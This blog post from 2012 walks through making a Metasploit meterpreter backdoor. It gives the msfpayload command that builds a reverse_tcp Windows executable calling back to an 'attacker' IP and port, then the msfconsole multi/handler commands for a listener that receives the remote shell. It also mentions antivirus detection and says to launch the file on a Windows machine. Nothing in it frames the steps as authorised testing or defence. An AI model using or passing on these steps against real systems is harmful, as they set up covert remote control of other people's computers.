Tuesday, 13 March 2012

Meterpreter as a Backdoor

Videos Referred

http://www.youtube.com/watch?v=BTfOzKACPsY

http://www.vimeo.com/1975301

After finding these videos on using meterpreter as a backdoor, I knew I had to make a post about it. I had been trying for a few days to get meterpreter to work as a backdoor, and I hadn't had much luck. This video tutorial was the answer to my prayers.


Now, I had to watch the video a few times because it was a tad bit confusing (unless you pay close attention). I'm hoping this little walk-through will make it clearer and easier to understand.

Step 1: Issue the command:

./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.146 LPORT=5555 X > metexe.exe


(TIP: You must first be in your Metasploit Framework folder)
 
(Warning: metexe.exe will be detected by some antiviruses - tested with Antivir)


Let me explain what this all does, first of all, "./msfpayload" is the application we are going to run. "windows/meterpreter/reverse_tcp" is the payload we want made into a windows binary. "LHOST=192.168.1.146" is a variable holding our (the attacker) IP address. "LPORT=5555" is a variable telling what port to connect back to. "X" (near the end of the command) instructs msfpayload to make it into a windows binary. Finally, "> metexe.exe" tells msfpayload where to save the file.

If you did everything correctly, you should now have a file named metexe.exe in the same directory that msfpayload is in (/pentest/exploits/framework3/, for example).
This is only half the battle, unfortunately. Sure this will connect back to us, but we don't have anything running on our attacker machine to accept the incoming connection. Let's fix this little problem.
Step 2: Start ./msfconsole

Step 3: Type these commands...



use exploit/multi/handler



set PAYLOAD windows/meterpreter/reverse_tcp


set LHOST 192.168.1.146


set LPORT 5555


exploit

(TIP: Be sure to change 192.168.1.146 to your IP address)


You will notice that this won't actually exploit anything, it will simply create a listener to accept the meterpreter connection. Try putting metexe.exe onto a windows machine (I don't think it works on Vista, yet) and launch it. If all goes smoothly, your listener should tell you that it just received a connection.


Good Luck . Any Queries Just Comment to the post ,will reply ASAP

No comments:

Post a Comment